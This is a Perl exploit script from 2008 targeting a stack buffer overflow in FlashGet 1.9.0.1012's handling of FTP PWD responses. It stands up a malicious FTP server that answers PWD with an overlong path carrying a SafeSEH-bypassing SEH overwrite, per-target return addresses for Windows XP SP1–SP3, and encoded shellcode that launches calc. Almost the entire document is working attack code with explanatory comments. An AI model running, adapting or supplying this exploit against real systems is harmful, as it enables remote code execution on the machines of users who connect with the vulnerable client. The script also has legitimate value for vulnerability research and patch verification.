
# Title : FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
# Published : 2008-08-17
# Author : Guido Landi


#!/usr/bin/perl
# k`sOSe 08/17/2008
# SafeSEH bypass: the overwritten exception handler points into flash9f.ocx,
# a module linked without /SAFESEH (see the per-target addresses below).

use warnings;
use strict;
use IO::Socket;

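# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
#
# 160 bytes (10 rows of 16): a PexFnstenvSub decoder stub followed by the
# XOR-encoded calc.exe payload.  The listing had lost the backslash of every
# "\x" escape, which would have turned this into a literal ASCII string of
# "x31xc9..." -- restored here so the bytes are what the comment claims.
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";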

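# Per-target SEH handler address: a pop/pop/ret inside flash9f.ocx (see the
# author's note at the PWD reply).  Little-endian, indexed by the 0-based
# target number taken from the command line: XP SP1 and SP2 share the same
# address, SP3 uses a different one.  As with the shellcode, the "\x" escapes
# had lost their backslashes in the listing and are restored here.
my @targets = ( "\x82\x01\x02\x30", "\x82\x01\x02\x30", "\x0b\x02\x01\x30" );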

# Target selection: the single argument must be 1, 2 or 3 (see usage());
# anything else prints the usage text and exits.  The accepted value is then
# turned into a 0-based index, which the PWD reply uses to pick from @targets.
usage() unless defined $ARGV[0] && $ARGV[0] =~ /^[123]$/;

$ARGV[0] -= 1;

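# Fake FTP server.  Binding port 21 needs root on Unix, and 0.0.0.0 exposes
# the listener on every interface, so anyone who can reach this host will
# get the malicious reply -- run it on an isolated network or firewall it.
# IO::Socket::INET leaves its failure reason in $@ (e.g. "Address already in
# use"); the original died with $!, which is often empty or misleading here.
my $sock = IO::Socket::INET->new(
					LocalAddr => '0.0.0.0',
					LocalPort => '21',
					Listen    => 1,
					Reuse     => 1
					) or die "cannot listen on 0.0.0.0:21: $@";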

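# Serve exactly one client: walk it through a minimal login dialogue and
# answer its PWD with an oversized directory name.  The loop body ends in
# exit, so only the first connection is ever handled.  Every FTP reply is
# CRLF-terminated; the listing had lost the backslashes ("rn", "x22"), which
# would have sent literal "rn"/"x22" text -- restored here.
while(my $csock = $sock->accept())
{
	# Each read_sock() consumes the client's next command line (USER,
	# PASS, ...).  The replies are canned and ignore what was actually sent.
	print $csock "220 Hello ;)\r\n";
	read_sock($csock);

	print $csock "331 pwd please\r\n";
	read_sock($csock);

	print $csock "230 OK\r\n";
	read_sock($csock);

	print $csock "250 CWD command successful.\r\n";
	read_sock($csock);

	# 257 reply whose quoted path carries the overflow.  Layout, per the
	# author's notes (classic SEH overwrite):
	#   324 bytes of filler, then
	#   4 bytes over the next-SEH slot: "\xEB\x06" short jump + 2 NOPs,
	#   4 bytes over the handler slot: pop/pop/ret in flash9f.ocx (by target),
	#   the 160-byte shellcode, then 840 NOPs of padding.
	print $csock "257 " . "\x22" .
			"\x41" x 324 .

			"\xEB\x06\x90\x90" . # jump ahead
			$targets[$ARGV[0]] . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH  ;)

			$shellcode .

			"\x90" x 840 .
			"\x22" .
			" is current directory.\r\n";

	close($csock);
	exit;
}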



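# Read one line (the client's next FTP command) from $sock and echo it to
# stdout for the operator.  Returns the line with its line ending intact,
# or undef if the client closed the connection before sending one.
sub read_sock
{
	my ($sock) = @_;

	my $buf = <$sock>;

	# A client that disconnects mid-dialogue yields undef here; report it
	# instead of tripping an uninitialized-value warning in the print.
	if (!defined $buf) {
		print "[client] -> (connection closed)\n";
		return;
	}

	print "[client] -> $buf";

	return $buf;
}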

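# Print the target list and terminate.  Called when the single argument is
# missing or not one of 1..3.  The message goes to STDERR with a non-zero
# status so a caller can tell a bad invocation from a completed run.  The
# listing's trailing "n" was a backslash-less "\n"; restored.
sub usage
{
	print STDERR "usage: $0 [1,2,3]
  1 -> Windows XP SP1
  2 -> Windows XP SP2
  3 -> Windows XP SP3\n";
	exit 1;
}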
